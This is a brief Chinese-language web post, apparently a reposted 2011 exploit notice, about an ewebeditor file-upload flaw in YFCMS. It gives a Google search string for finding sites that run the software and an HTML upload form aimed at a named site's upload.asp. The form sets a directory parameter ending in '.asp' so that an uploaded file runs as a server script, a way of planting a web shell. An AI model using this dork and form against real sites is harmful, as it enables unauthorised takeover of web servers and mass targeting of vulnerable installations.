YFCMS最新漏洞之ewebeditor上传漏洞

2011-8-22 12:42:58 来源:网络转载 浏览:109
YFCMS最新漏洞之ewebeditor上传漏洞

google关键字:intext:版权所有:yfcms

利用文件:admin\WebEditor\asp\upload.asp

利用代码:

<form action="http://www.koohik.cn /admin/WebEditor\asp\upload.asp?action=save&type=image&style=popup&cusdir=st999.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

这里有个前提 ,要知道网站的后台目录才行。

 

(0)
(0)